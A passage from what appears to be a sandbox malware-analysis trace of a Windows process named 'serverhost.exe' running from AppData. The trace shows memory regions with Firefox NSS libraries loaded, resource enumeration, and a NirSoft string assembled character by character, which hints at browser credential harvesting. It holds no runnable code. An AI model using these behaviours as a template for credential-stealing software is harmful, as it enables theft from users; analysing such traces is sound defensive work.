files\\mozilla firefox\\nssdbm3.dll") Region: id = 2136 start_va = 0x6f3d0000 end_va = 0x6f41efff entry_point = 0x6f406402 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files\\mozilla firefox\\freebl3.dll") Region: id = 2137 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2138 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2139 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2140 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2141 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2142 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2143 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2144 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2145 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2146 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2147 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2148 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2149 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2150 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2151 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2152 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2153 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2154 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2155 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2156 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2157 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2158 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2159 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2160 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 2161 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2162 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2163 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2164 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2165 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2166 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2167 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2168 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2169 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2170 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2171 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2172 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2173 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2174 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2175 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2176 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2177 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2178 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2179 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2180 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2181 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2182 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2183 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2184 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2185 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2186 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2187 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2188 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2189 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2190 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2191 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2192 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2193 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2194 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2195 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2196 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Thread: id = 90 os_tid = 0xc68 [0085.676] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0085.676] __set_app_type (_Type=0x2) [0085.677] __p__fmode () returned 0x768231f4 [0085.677] __p__commode () returned 0x768231fc [0085.677] __wgetmainargs (in: _Argc=0x28fbf4, _Argv=0x28fbf8, _Env=0x28fbfc, _DoWildCard=0, _StartInfo=0x28fc00 | out: _Argc=0x28fbf4, _Argv=0x28fbf8, _Env=0x28fbfc) returned 0 [0085.677] _onexit (_Func=0x444109) returned 0x444109 [0085.677] _onexit (_Func=0x44411a) returned 0x44411a [0085.677] _onexit (_Func=0x44412b) returned 0x44412b [0085.677] _onexit (_Func=0x44414a) returned 0x44414a [0085.677] _onexit (_Func=0x44418b) returned 0x44418b [0085.677] _onexit (_Func=0x44419c) returned 0x44419c [0085.677] GetStartupInfoW (in: lpStartupInfo=0x28fba8 | out: lpStartupInfo=0x28fba8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0085.677] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0085.677] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6eb50000 [0085.678] GetProcAddress (hModule=0x6eb50000, lpProcName="InitCommonControlsEx") returned 0x6eb56be6 [0085.678] InitCommonControlsEx (picce=0x28f460) returned 1 [0085.678] FreeLibrary (hLibModule=0x6eb50000) returned 1 [0085.678] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0085.678] GetProcAddress (hModule=0x758a0000, lpProcName="SHGetSpecialFolderPathW") returned 0x758c0468 [0085.678] SetErrorMode (uMode=0x8001) returned 0x0 [0085.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.678] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x413540, lParam=0x0) returned 1 [0085.678] EnumResourceNamesW (hModule=0x400000, lpType=0x1, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.678] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x4545f8 [0085.678] SizeofResource (hModule=0x400000, hResInfo=0x4545f8) returned 0x134 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x4545f8) returned 0x454868 [0085.679] LockResource (hResData=0x454868) returned 0x454868 [0085.679] EnumResourceNamesW (hModule=0x400000, lpType=0x2, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.679] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x454608 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454608) returned 0x3e8 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454608) returned 0x45499c [0085.679] LockResource (hResData=0x45499c) returned 0x45499c [0085.679] FindResourceW (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x454618 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454618) returned 0xd8 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454618) returned 0x454d84 [0085.679] LockResource (hResData=0x454d84) returned 0x454d84 [0085.679] FindResourceW (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x454628 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454628) returned 0xd8 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454628) returned 0x454e5c [0085.679] LockResource (hResData=0x454e5c) returned 0x454e5c [0085.679] EnumResourceNamesW (hModule=0x400000, lpType=0x3, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.679] FindResourceW (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x454638 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454638) returned 0x10a8 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454638) returned 0x454f34 [0085.679] LockResource (hResData=0x454f34) returned 0x454f34 [0085.679] FindResourceW (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x454648 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454648) returned 0x468 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454648) returned 0x455fdc [0085.679] LockResource (hResData=0x455fdc) returned 0x455fdc [0085.679] FindResourceW (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x454658 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454658) returned 0x468 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454658) returned 0x456444 [0085.679] LockResource (hResData=0x456444) returned 0x456444 [0085.679] FindResourceW (hModule=0x400000, lpName=0x5, lpType=0x3) returned 0x454668 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454668) returned 0x468 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454668) returned 0x4568ac [0085.679] LockResource (hResData=0x4568ac) returned 0x4568ac [0085.679] FindResourceW (hModule=0x400000, lpName=0x6, lpType=0x3) returned 0x454678 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454678) returned 0x468 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454678) returned 0x456d14 [0085.679] LockResource (hResData=0x456d14) returned 0x456d14 [0085.679] FindResourceW (hModule=0x400000, lpName=0x7, lpType=0x3) returned 0x454688 [0085.679] SizeofResource (hModule=0x400000, hResInfo=0x454688) returned 0x468 [0085.679] LoadResource (hModule=0x400000, hResInfo=0x454688) returned 0x45717c [0085.679] LockResource (hResData=0x45717c) returned 0x45717c [0085.680] FindResourceW (hModule=0x400000, lpName=0x8, lpType=0x3) returned 0x454698 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x454698) returned 0x468 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x454698) returned 0x4575e4 [0085.680] LockResource (hResData=0x4575e4) returned 0x4575e4 [0085.680] FindResourceW (hModule=0x400000, lpName=0x9, lpType=0x3) returned 0x4546a8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x468 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x457a4c [0085.680] LockResource (hResData=0x457a4c) returned 0x457a4c [0085.680] EnumResourceNamesW (hModule=0x400000, lpType=0x4, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.680] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x4546b8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546b8) returned 0x424 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546b8) returned 0x457eb4 [0085.680] LockResource (hResData=0x457eb4) returned 0x457eb4 [0085.680] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x4546c8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546c8) returned 0x1f4 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546c8) returned 0x4582d8 [0085.680] LockResource (hResData=0x4582d8) returned 0x4582d8 [0085.680] EnumResourceNamesW (hModule=0x400000, lpType=0x5, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.680] FindResourceW (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x4546d8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546d8) returned 0xa2 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546d8) returned 0x4584cc [0085.680] LockResource (hResData=0x4584cc) returned 0x4584cc [0085.680] FindResourceW (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x4546e8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x296 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x458570 [0085.680] LockResource (hResData=0x458570) returned 0x458570 [0085.680] FindResourceW (hModule=0x400000, lpName=0x6e, lpType=0x5) returned 0x4546f8 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x5be [0085.680] LoadResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x458808 [0085.680] LockResource (hResData=0x458808) returned 0x458808 [0085.680] FindResourceW (hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x454708 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x454708) returned 0xfa [0085.680] LoadResource (hModule=0x400000, hResInfo=0x454708) returned 0x458dc8 [0085.680] LockResource (hResData=0x458dc8) returned 0x458dc8 [0085.680] FindResourceW (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x454718 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x454718) returned 0x336 [0085.680] LoadResource (hModule=0x400000, hResInfo=0x454718) returned 0x458ec4 [0085.680] LockResource (hResData=0x458ec4) returned 0x458ec4 [0085.680] EnumResourceNamesW (hModule=0x400000, lpType=0x6, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.680] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x454728 [0085.680] SizeofResource (hModule=0x400000, hResInfo=0x454728) returned 0x234 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454728) returned 0x4591fc [0085.681] LockResource (hResData=0x4591fc) returned 0x4591fc [0085.681] FindResourceW (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x454738 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454738) returned 0x138 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454738) returned 0x459430 [0085.681] LockResource (hResData=0x459430) returned 0x459430 [0085.681] FindResourceW (hModule=0x400000, lpName=0x23, lpType=0x6) returned 0x454748 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454748) returned 0x58 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454748) returned 0x459568 [0085.681] LockResource (hResData=0x459568) returned 0x459568 [0085.681] FindResourceW (hModule=0x400000, lpName=0x26, lpType=0x6) returned 0x454758 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454758) returned 0xf6 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454758) returned 0x4595c0 [0085.681] LockResource (hResData=0x4595c0) returned 0x4595c0 [0085.681] FindResourceW (hModule=0x400000, lpName=0x27, lpType=0x6) returned 0x454768 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454768) returned 0x96 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454768) returned 0x4596b8 [0085.681] LockResource (hResData=0x4596b8) returned 0x4596b8 [0085.681] FindResourceW (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x454778 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454778) returned 0xba [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454778) returned 0x459750 [0085.681] LockResource (hResData=0x459750) returned 0x459750 [0085.681] FindResourceW (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x454788 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454788) returned 0x52 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454788) returned 0x45980c [0085.681] LockResource (hResData=0x45980c) returned 0x45980c [0085.681] FindResourceW (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x454798 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x454798) returned 0x68 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x454798) returned 0x459860 [0085.681] LockResource (hResData=0x459860) returned 0x459860 [0085.681] EnumResourceNamesW (hModule=0x400000, lpType=0x9, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.681] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x4547a8 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x48 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x4598c8 [0085.681] LockResource (hResData=0x4598c8) returned 0x4598c8 [0085.681] EnumResourceNamesW (hModule=0x400000, lpType=0xc, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.681] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x4547b8 [0085.681] SizeofResource (hModule=0x400000, hResInfo=0x4547b8) returned 0x14 [0085.681] LoadResource (hModule=0x400000, hResInfo=0x4547b8) returned 0x459910 [0085.681] LockResource (hResData=0x459910) returned 0x459910 [0085.681] EnumResourceNamesW (hModule=0x400000, lpType=0xe, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.682] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x4547c8 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x4547c8) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x4547c8) returned 0x459924 [0085.682] LockResource (hResData=0x459924) returned 0x459924 [0085.682] FindResourceW (hModule=0x400000, lpName=0x6f, lpType=0xe) returned 0x4547d8 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x459938 [0085.682] LockResource (hResData=0x459938) returned 0x459938 [0085.682] FindResourceW (hModule=0x400000, lpName=0x72, lpType=0xe) returned 0x4547e8 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x45994c [0085.682] LockResource (hResData=0x45994c) returned 0x45994c [0085.682] FindResourceW (hModule=0x400000, lpName=0x73, lpType=0xe) returned 0x4547f8 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x459960 [0085.682] LockResource (hResData=0x459960) returned 0x459960 [0085.682] FindResourceW (hModule=0x400000, lpName=0x74, lpType=0xe) returned 0x454808 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454808) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454808) returned 0x459974 [0085.682] LockResource (hResData=0x459974) returned 0x459974 [0085.682] FindResourceW (hModule=0x400000, lpName=0x75, lpType=0xe) returned 0x454818 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454818) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454818) returned 0x459988 [0085.682] LockResource (hResData=0x459988) returned 0x459988 [0085.682] FindResourceW (hModule=0x400000, lpName=0x76, lpType=0xe) returned 0x454828 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454828) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454828) returned 0x45999c [0085.682] LockResource (hResData=0x45999c) returned 0x45999c [0085.682] FindResourceW (hModule=0x400000, lpName=0x77, lpType=0xe) returned 0x454838 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454838) returned 0x14 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454838) returned 0x4599b0 [0085.682] LockResource (hResData=0x4599b0) returned 0x4599b0 [0085.682] EnumResourceNamesW (hModule=0x400000, lpType=0x10, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.682] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x454848 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454848) returned 0x308 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454848) returned 0x4599c4 [0085.682] LockResource (hResData=0x4599c4) returned 0x4599c4 [0085.682] EnumResourceNamesW (hModule=0x400000, lpType=0x18, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0085.682] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x454858 [0085.682] SizeofResource (hModule=0x400000, hResInfo=0x454858) returned 0x445 [0085.682] LoadResource (hModule=0x400000, hResInfo=0x454858) returned 0x459ccc [0085.682] LockResource (hResData=0x459ccc) returned 0x459ccc [0085.683] wcscpy (in: _Dest=0x28f410, _Source="Arial" | out: _Dest="Arial") returned="Arial" [0085.683] CreateFontIndirectW (lplf=0x28f3f4) returned 0x2a0a08f4 [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="N", _Count=0x1 | out: _Dest="N") returned="N" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="i", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="r", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="S", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="o", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="f", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="t", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="F", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="a", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0085.695] wcsncat (in: _Dest=0x28f95a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="h", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="p", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=":", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") returned="NirSoft Freeware. http://www" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") 